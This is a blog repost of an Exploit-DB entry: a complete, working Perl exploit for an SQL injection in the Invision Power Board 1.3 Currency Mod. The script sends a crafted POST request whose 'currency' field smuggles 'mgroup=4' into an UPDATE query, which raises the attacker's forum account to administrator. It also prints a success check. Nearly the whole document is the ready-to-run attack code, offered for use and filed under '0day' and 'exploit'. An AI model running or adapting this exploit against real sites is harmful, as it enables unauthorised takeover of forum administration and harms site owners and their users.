Invision Power Board Currency Mod(edit) SQL injection

# Title: Invision Power Board Currency Mod(edit) SQL injection
# EDB-ID: 11702
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Pr0T3cT10n
# Published: 2010-03-12
# Verified: no
# Download Exploit Code
# Download N/A

view sourceprint?# Exploit Title: Invision Power Board Currency Mod(edit) SQL injection

# Date: 17/04/2007

# Author: Pr0T3cT10n

# Software Link: www.invisionpower.com

# Version: 1.3

# Tested on: 1.3

# CVE:

# Code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109

#!/usr/bin/perl  
 
#########################################################################  
 
# Invision Power Board Currency Mod(edit) SQL injection. #  
 
# Bug found by Pr0T3cT10n, pr0t3ct10n@gmail.com<mailto:pr0t3ct10n@gmail.com> #  
 
# The exploit is updating your user to an admin account #  
 
# **YOU SHOULD HAVE CURRENCY EDIT ACCESS!** #  
 
#########################################################################  
 
use IO::Socket;  
 
use Digest::MD5 qw(md5_hex);  
 
 
 
$host = $ARGV[0];  
 
$path = $ARGV[1];  
 
$id = $ARGV[2];  
 
$passwd = $ARGV[3];  
 
 
 
if(!$ARGV[3])  
 
{  
 
print "#################################################\n";  
 
print "## IPB Currency Mod SQL injection Exploit. ##\n";  
 
print "## Discoverd By Pr0T3cT10n. ##\n";  
 
print "#################################################\n";  
 
print "$0 [host] [path] [your id] [your passowrd]\n";  
 
print "$0 host.com /forum 567 123456\n";  
 
print "#################################################\n";  
 
exit();  
 
}  
 
print "[~] Connecting $host:80...\n";  
 
$socket = IO::Socket::INET->new(  
 
Proto => "tcp" ,  
 
PeerAddr => $host ,  
 
PeerPort => "80") or die("[-] Connection faild.\n");  
 
print "[+] Connected.\n[~] Sending POST information...\n";  
 
$pack.= "POST " . $path . "/index.php?act=modcp&CODE=docurrencyedit&memberid=" . $id . " HTTP/1.1\r\n";  
 
$pack.= "Host: " . $host . "\r\n";  
 
$pack.= "User-Agent: No_Agent\r\n";  
 
$pack.= "Accept: */*\r\n";  
 
$pack.= "Cookie: member_id=" .$id. "; pass_hash=" .md5_hex($passwd). "\r\n";  
 
$pack.= "Keep-Alive: 300\r\n";  
 
$pack.= "Connection: keep-alive\r\n";  
 
$pack.= "Content-Type: application/x-www-form-urlencoded\r\n";  
 
$pack.= "Content-Length: 24\r\n\r\n";  
 
$pack.= "currency=1%20%2Cmgroup=4"; #UPDATE ibf_members SET currency=1 ,mgroup=4 WHERE id='$id'  
 
 
 
print $socket $pack;  
 
 
 
while($res = <$socket>)  
 
{  
 
if($res =~ /<table align='center' cellpadding="4" class="tablefill">/)  
 
{  
 
print("[+] succeed.\n");  
 
exit();  
 
}  
 
}  
 
print("[-] Faild.\n");  
 
exit();

Related Posts

Tags: ,

This entry was posted on Saturday, March 13th, 2010 at 1:05 pm and is filed under 0day, Vulnerable InforMation, exploit. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

Leave a Reply